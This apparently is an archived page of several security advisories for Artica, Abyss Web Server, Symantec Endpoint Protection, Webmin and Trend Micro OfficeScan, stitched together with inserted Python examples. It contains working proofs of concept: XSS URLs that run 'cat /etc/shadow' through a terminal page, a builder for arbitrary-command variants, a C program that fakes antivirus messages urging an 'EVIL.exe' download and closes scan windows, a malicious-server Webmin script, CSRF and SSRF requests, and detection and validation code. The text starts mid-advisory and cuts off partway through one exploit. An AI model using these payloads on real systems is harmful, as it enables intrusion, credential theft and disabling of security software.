https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
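The two PoC URLs above differ only in the command carried in 'cmdline'. The following is an added example (not part of the advisory and not Artica code) that builds the same reflected-XSS-to-RCE URL for an arbitrary command, decodes a request back to the JavaScript the victim's browser would run, and flags such requests in web-server access logs. The host names, the port default of 9000 taken from the PoC, and the log lines are constructed for the example.

```python
"""Artica CVE-2017-17055: payload builder and access-log detector (added example)."""
import re
from urllib.parse import quote, unquote

VULN_PAGE = "/freeradius.users.php"
PARAM = "username-form-id"
TERMINAL = "/system.terminal.php"


def build_artica_xss_url(victim, cmd, port=9000):
    """Reflected value lands inside a <script> block, so the payload first closes
    it, then opens its own script that POSTs cmdline=<cmd> to system.terminal.php
    using the victim's authenticated session, and re-opens a script tag so the
    remainder of the original block still parses."""
    base = f"https://{victim}:{port}"
    js = (
        "var xhr=new XMLHttpRequest();"
        "xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};"
        f"xhr.open('POST','{base}{TERMINAL}',true);"
        "xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');"
        f"xhr.send('cmdline={cmd}');"
    )
    payload = f"</script><script>{js}</script><script>"
    return f"{base}{VULN_PAGE}?{PARAM}={quote(payload, safe='')}"


_PARAM_RE = re.compile(r"[?&]" + re.escape(PARAM) + r"=([^&\s]*)")


def injected_script(request_target):
    """Decode the parameter of a URL or request line back to the injected text."""
    m = _PARAM_RE.search(request_target)
    return unquote(m.group(1)) if m else ""


_SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
# Apache/nginx combined log format: client, ident, user, [time], "METHOD target HTTP/x"
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Constructed sample log lines; the second carries the advisory's PoC payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/2018:10:01:00 +0000] "GET /freeradius.users.php?username-form-id=42 HTTP/1.1" 200 1832',
    '203.0.113.7 - - [08/Jan/2018:10:02:13 +0000] "GET /freeradius.users.php?username-form-id='
    '%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();'
    'xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);'
    'xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E HTTP/1.1" 200 1832',
    '10.0.0.9 - - [08/Jan/2018:10:03:40 +0000] "POST /system.terminal.php HTTP/1.1" 200 77',
]


def flag_xss_requests(log_lines):
    """Return (client_ip, decoded_parameter) for requests to the vulnerable page
    whose username-form-id value contains script markup after URL decoding."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        if not target.startswith(VULN_PAGE):
            continue
        decoded = injected_script(target)
        if _SCRIPT_TAG_RE.search(decoded):
            hits.append((client, decoded))
    return hits


if __name__ == "__main__":
    print(build_artica_xss_url("VICTIM-IP", "id"))
    for client, decoded in flag_xss_requests(SAMPLE_LOG):
        print(f"[!] {client}: {decoded}")
```

The detector decodes before matching, so encoding the tag as `%3C%2Fscript%3E` (as the PoC does) does not evade it; the fix on the server side is to HTML-escape the parameter before reflecting it, and to require a CSRF token on system.terminal.php so a browser-borne request cannot reuse the session.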


Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: November 28, 2017  
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017  : Public Disclosure





Abyss Web Server < v2.11.6 Memory Heap Corruption (hyp3rlinx / apparitionsec)

2018-01-08 Thread apparitionsec
[+] Credits: John Page (aka HyP3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
aprelium.com



Product:
===
Abyss Web Server < v2.11.6



Vulnerability Type:
===
Memory Heap Corruption



CVE Reference:
==
N/A



Security Issue:
===
It is possible to corrupt heap memory of the Abyss Web Server by sending specially 
crafted HTML in repeated HTTP POST requests.
Users should upgrade to the latest version, v2.11.6.


GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP: 
msvcrt!memcpy+5a
75e49b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x0000005a)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 003b9000
Attempt to read from address 003b9000

CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=00000000 ebx=075c33f8 ecx=000efd46 edx=00000002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404          add     esp,4

PROCESS_NAME:  abyssws.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  003b9000

READ_ADDRESS:  003b9000 

FOLLOWUP_IP: 
abyssws+413d9
004413d9 59  pop ecx

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

APP:  abyssws.exe

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre

LAST_CONTROL_TRANSFER:  from 0043f840 to 75e49b60

FAULTING_THREAD:  

BUGCHECK_STR:  
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE

PRIMARY_PROBLEM_CLASS:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

DEFAULT_BUCKET_ID:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE

STACK_TEXT:  
777542a8 776cd9bc ntdll!RtlFreeHeap+0x64
777542ac 75e498cd msvcrt!free+0xcd
777542b0 004413d9 abyssws+0x413d9
777542b4 004089d0 abyssws+0x89d0
777542b8 0040a607 abyssws+0xa607
777542bc 0040bd58 abyssws+0xbd58
777542c0 0040cb5b abyssws+0xcb5b


SYMBOL_STACK_INDEX:  2

SYMBOL_NAME:  abyssws+413d9

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: abyssws

IMAGE_NAME:  abyssws.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  5807a3cb

STACK_COMMAND:  dps 777542a8 ; kb

FAILURE_BUCKET_ID:  
ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c0000005_abyssws.exe!Unknown

BUCKET_ID:  
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  
um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c0000005_abyssws.exe!unknown

FAILURE_ID_HASH:  {0ba3122b-4351-5a85-a0ea-294a6ce77042}

Followup: MachineOwner
---------


///////


The stored exception information can be accessed via .ecxr.
(2740.30b8): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=075c33f8 ecx=000efd46 edx=00000002 esi=075c33b8 edi=0651edb0
eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwGetContextThread+0x12:
77670c52 83c404          add     esp,4
0:011> !load winext/msec
0:011> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x00000250 (Hash=0xb1db8cd3.0x508907b2)

This is a read access violation in a block data move, and is therefore classified as probably exploitable.

References:

https://aprelium.com/news/abws2-11-6.html



Exploit/POC:
=
Cause Heap Corruption in Abyss Server.





//Abyss Web Server Memory (heap) Corruption POC
//Discover by hyp3rlinx
//Error code: 0xc0000374 is STATUS_HEAP_CORRUPTION
//0xc0000374 - heap has been corrupted.
//===========================================
window.onerror=function(){
  return true   //swallow script errors so the POST loop keeps running
}


//Abyss administration console (default port 9999), target of the repeated POSTs
var target='http://VICTIM-IP:9999/hosts/host@0/edit/ipcontrol';

function mk_iframe_targets(f){
  var tmp = document.createElement('IFRAME')
  tmp.style='display:none'
  tmp.name='hidden-frame'+f
  return tmp
}

function mk_inputs(id,na

Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331 (hyp3rlinx)

2017-11-13 Thread apparitionsec
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.symantec.com



Product:
===
Symantec Endpoint Protection
v12.1.6 (12.1 RU6 MP5) 
Symantec 12.1.7004.6500 



Vulnerability Type:
===
Tamper-Protection Bypass
Denial Of Service / Message Spoof



CVE Reference:
==
CVE-2017-6331
SSG16-041



Security Issue:
===
Symantec Endpoint Protection (SEP) does not validate where Win32 window messages 
come from (no UIPI isolation of its UI).
Therefore, local malware can easily spoof messages to the UI, or send 
WM_SYSCOMMAND / SC_CLOSE to close the SEP UI, denying the end user the ability 
to scan or otherwise run the Endpoint Protection AntiVirus. Spoofed messages 
could also tell the user that a scan came back clean.

Unfortunately Symantec's advisory left out the details of the Denial Of Service, 
as well as minimizing the amount of text malware could inject into the UI, which 
compromises the integrity of the Symantec Endpoint Protection Control Panel 
user interface.


References:
===
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00
 


Exploit/POC:
===

1) Compile the C program below. It targets various components of SEP; comment 
out whatever you do not want to send to the UI.

2) Try to open the Symantec Endpoint UI and you will be denied.

3) Or inject attacker-supplied messages instructing the user that the file is 
clean, etc.


#include <windows.h>
#define VICTIM "DevViewer.exe"

//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7
//How: FindWindow / SendMessage Win32 API
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.

int main(void){

   while(1){

   //Locate the SEP status window by its caption; no check is made by SEP on who sends it messages.
   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));

   if(hWnd!=NULL){
     //This injects arbitrary messages to SEP UI.
     SetWindowText(hWnd, TEXT("*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***"));
     //This prevents a user from being able to run AV scans and renders SEP UI useless
     //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);

   //Each handle is checked before use: SendMessage() on a NULL HWND simply fails.
   HWND x = FindWindow(NULL, TEXT("DevViewer"));
   if(x!=NULL){
     SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
   if(x2!=NULL){
     SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
   if(x3!=NULL){
     SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
   if(x4!=NULL){
     SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   Sleep(1000);   //Win32 Sleep() takes milliseconds

   }
   return 0;
}


Network Access:
===
Local




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017  : Public Disclosure





Webmin v1.850 Remote Code Execution (hyp3rlinx / apparitionsec)

2017-11-06 Thread apparitionsec
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin 
version 1.850

Webmin “is a web-based interface for system administration for Unix. Using any 
modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix 
configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the 
functions built into Webmin.”

The vulnerabilities found are:

XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery

Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability 
to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released patches to address these vulnerabilities.

For more information: 
https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9
 and http://www.webmin.com/security.html


Vulnerability details
XSS vulnerability that leads to Remote Code Execution

Under the Webmin menu 'Others/File Manager' there is an option to download a 
file from a remote server, 'Download from remote URL'.

By setting up a malicious server we can wait for the file download request and 
then answer it with an XSS payload that leads to Remote Code Execution.

Webmin echoes the 'File Download' request status back into the page, which is 
where the XSS triggers. Webmin's Referer check is bypassed by setting 
document.domain to the Webmin victim's IP before submitting the command to the 
shell module.

Proof of Concept


import socket

#===========================================================
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#-----------------------------------------------------------
#e.g.
#Download from remote URL
#http://x.x.x.x:10000/shell/index.cgi
#> whoami
#root

PORT=int(input("[PORT]> "))        #port we listen on for file download requests
WEBMIN_IP=input("[Webmin IP]> ")   #victim

#Read /etc/shadow file
#XSS payload: set document.domain for the Webmin host, then auto-submit the form
#aimed at the shell module (Webmin listens on 10000 by default)
CMD=("/>document.domain='http://"+WEBMIN_IP+":10000/shell/index.cgi'"+
""+
"document.forms[0].submit()")

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
HOST = ''
s.bind((HOST, PORT))
s.listen(5)

print('\nwebmin file download 0day...')

while True:
    conn, addr = s.accept()
    print('Connected!', addr)
    print(conn.recv(1024).decode(errors='replace'))   #webmin's download request
    conn.sendall((CMD+'\r\n').encode())               #answer it with the payload
    conn.close()




CSRF Schedule arbitrary commands

User-controlled input is not sufficiently sanitized: by sending a GET request to 
create_job.cgi (the 'at' scheduler module) with the parameter dir=/=ls, an 
attacker can execute arbitrary commands. Because it is a plain GET, the request 
can be forged from a page the administrator visits (CSRF).

Proof of Concept

http://x.x.x.x:10000/at/create_job.cgi?user=root=31=7=2017=2=00=/=ls -lt=0

Server Side Request Forgery

User-controlled input is not sufficiently sanitized: by sending a GET request to 
tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can have the Webmin server 
fetch arbitrary URLs on their behalf (Server Side Request Forgery), including 
hosts that are only reachable from the Webmin server itself.

Proof of Concept


http://x.x.x.x:10000/tunnel/link.cgi/http://VICTIM-IP:8000


Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:

Would like to acknowledge Beyond Security’s SSD program for the help with 
co-ordination of this vulnerability.
More details can be found on their blog at:

https://blogs.securiteam.com/index.php/archives/3430






Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085 (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


Vulnerability Type:
===
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure

OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



CVE Reference:
==
CVE-2017-14085



Security Issue(s):
===
( NT Domain Disclosure )
Remote unauthenticated attackers who can reach the Trend Micro OfficeScan XG 
application can query the network's NT domains.
This NT domain enumeration is leaked by the web interface when it should not be. 
Usually you would need NET commands on the network for this, so while the 
enumeration is not high in severity, it should not be returned at all, and 
especially not to unauthorized users, as it can aid in launching further attacks.


( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to the Trend Micro OfficeScan 
XG application can query the PHP version and loaded modules.

In 'analyzeWF.php' we see get_loaded_extensions() and phpversion() calls, but 
no session or authentication check is made.

$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);

etc...


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC (NT Domain Disclosure):
=
[root@localhost /]# curl -v -k  
https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
*   Trying VICTIM-IP... connected


< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
   "ERROR" : {
  "ERROR_CODE" : 0
   },
   "RESPONSE" : {
  "NODES" : [
 {
"NAME" : "Avaya"
 },
 {
"NAME" : "Km-netprinters"
 },
 {
"NAME" : "Mshome"
 },
 {
"NAME" : "Printserver"
 },
 {
"NAME" : "MyDomain"
 },
 {
"NAME" : "Workgroup"
 },
 {
"NAME" : "Xpemb"
 }
  ]
   }
}


Exploit / POC (PHP Information Disclosure):

c:\> curl -k 
https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php

HTTP/1.1 200 OK

[INI_UPDATE_SECTION]

>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, 
iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, 
tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, 
xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, 
soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.

etc...



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure




Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Server Side Request Forgery (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:
===
OfficeScan 
v11.0 and XG (12.0)*





Vulnerability Type:
===
Unauthorized Server Side Request Forgery



CVE Reference:
===
N/A



Security Issue:
===
Unauthorized LAN attackers who can reach the OfficeScan XG application can make 
it issue arbitrary HTTP requests to external and internal servers by abusing a 
Server Side Request Forgery flaw in the "help_Proxy.php" functionality: the 
"url" parameter is fetched without validation, and the JSON response echoes the 
HTTP status code of the target, which tells the attacker whether the host is 
reachable from the server.




Exploit/POC:
=
https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://:8080

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

 - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -

help_proxy.php HTTP response:
{"request_url":"http:\/\/:8080","http_code":200,"flag":1}
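The missing piece in help_proxy.php above, and equally in Webmin's tunnel/link.cgi described earlier on this page, is any validation of the URL the server is asked to fetch. The following is an added example (not Trend Micro or Webmin code) of the check a server-side fetcher should apply before issuing the request: allowed schemes and ports, no userinfo, no literal IP addresses, a host allowlist, and a resolved-address check. The allowlisted host names are assumptions chosen for the example; the resolver is injected so the check can be exercised offline and so the caller can pin the resolved address for the actual fetch.

```python
"""SSRF target validation for a server-side URL fetcher (added example)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hosts the proxy is legitimately allowed to reach (assumed allowlist).
ALLOWED_HOSTS = {"docs.trendmicro.com", "success.trendmicro.com"}


def is_public_address(ip):
    """True only for globally routable unicast addresses."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or
                ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_proxy_target(url, resolve=None):
    """Return (ok, reason). `resolve` maps a hostname to an IP string; pass a
    real resolver in production and reuse its answer for the fetch itself so a
    DNS rebinding between check and use cannot redirect the request."""
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError on a non-numeric port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL (host confusion)"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port not in (None, 80, 443):
        return False, f"port {port} not allowed"
    try:
        ipaddress.ip_address(host)
        return False, "literal IP addresses not allowed"
    except ValueError:
        pass                          # a host name, as expected
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    if resolve is not None:
        addr = ipaddress.ip_address(resolve(host))
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


# Constructed targets mirroring the PoCs on this page plus common SSRF pivots.
SAMPLE_TARGETS = [
    "http://VICTIM-IP:8000/",                        # Webmin tunnel/link.cgi PoC
    "http://10.0.0.1:8080",                          # internal host via help_proxy.php
    "http://169.254.169.254/latest/meta-data/",      # cloud metadata service
    "file:///etc/passwd",
    "http://docs.trendmicro.com@evil.example/",
    "https://docs.trendmicro.com/",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        ok, why = check_proxy_target(target, resolve=lambda h: "93.184.216.34")
        print(f"{'ALLOW' if ok else 'DENY ':5} {target}  ({why})")
```

Rejecting literal IP addresses outright is deliberate: it closes the decimal, octal and IPv6-mapped spellings of 127.0.0.1 in one rule, and an allowlisted name can be resolved and checked instead.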


Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  May 31, 2017
Vendor reply: "We confirmed that this is a valid vulnerability. We are now 
working on a hotfix to remediate the issue." : June 30, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure





Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084 (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan
v11.0 and XG (12.0)*





Vulnerability Type:
===
Man-in-the-Middle (MITM) Remote Code Execution



CVE Reference:
==
CVE-2017-14084



Security Issue:
===
A MITM vector exists because the cURL request made by the Send() function in 
"HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set 
to false (0).
CURLOPT_SSL_VERIFYPEER makes cURL check that the remote certificate is valid 
and was issued by a CA you trust; CURLOPT_SSL_VERIFYHOST (value 2) checks that 
the certificate was issued to the host you intended to talk to. With both 
disabled, anyone on the network path can present any certificate and read or 
alter the connection's traffic.


References:
===
https://success.trendmicro.com/solution/1118372


Vulnerable code snippet...

curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);   <=== HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);   <=== THERE
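Settings like the two flagged lines are easy to grep for in a code review but easy to miss when the handle is configured in several places. The following is an added example (not Trend Micro code) of a small review-time scanner that walks PHP source for curl_setopt() calls and reports any that disable peer verification or set CURLOPT_SSL_VERIFYHOST to anything other than 2, the only value PHP documents as verifying the host name. The sample it runs over is the snippet above re-embedded as a constructed string, with a correctly configured second handle added for contrast.

```python
"""Flag curl_setopt() calls that weaken TLS verification (added example)."""
import re

# Constructed sample: the vulnerable HttpTalk.php lines plus a hardened handle.
SAMPLE_PHP = r'''
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
'''

# curl_setopt(<handle>, CURLOPT_SSL_VERIFYPEER|CURLOPT_SSL_VERIFYHOST, <value>)
SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*([^,]+?)\s*,\s*(CURLOPT_SSL_VERIFY(?:PEER|HOST))\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE,
)


def scan_curl_tls(php_source):
    """Return (line_no, handle, option, value, finding) for each weak setting.
    Calls are matched per line; a call split over several lines is not seen."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for handle, option, value in SETOPT_RE.findall(line):
            option = option.upper()
            value = value.strip().strip("'\"").lower()
            if option == "CURLOPT_SSL_VERIFYPEER" and value in ("0", "false", "null"):
                findings.append((line_no, handle, option, value,
                                 "peer certificate not verified: MITM with any cert"))
            elif option == "CURLOPT_SSL_VERIFYHOST" and value != "2":
                findings.append((line_no, handle, option, value,
                                 "host name not verified: only 2 checks the cert matches the host"))
    return findings


if __name__ == "__main__":
    for line_no, handle, option, value, finding in scan_curl_tls(SAMPLE_PHP):
        print(f"line {line_no}: {handle} {option}={value}  -> {finding}")
```

The hardened handle in the sample shows the fix: leave both options at their defaults (CURLOPT_SSL_VERIFYPEER true, CURLOPT_SSL_VERIFYHOST 2) and, if the server certificate is self-signed, point CURLOPT_CAINFO at that certificate instead of switching verification off.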



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure





Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Start Remote Process Code Execution / DOS - INI Corruption CVE-2017-14086 (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
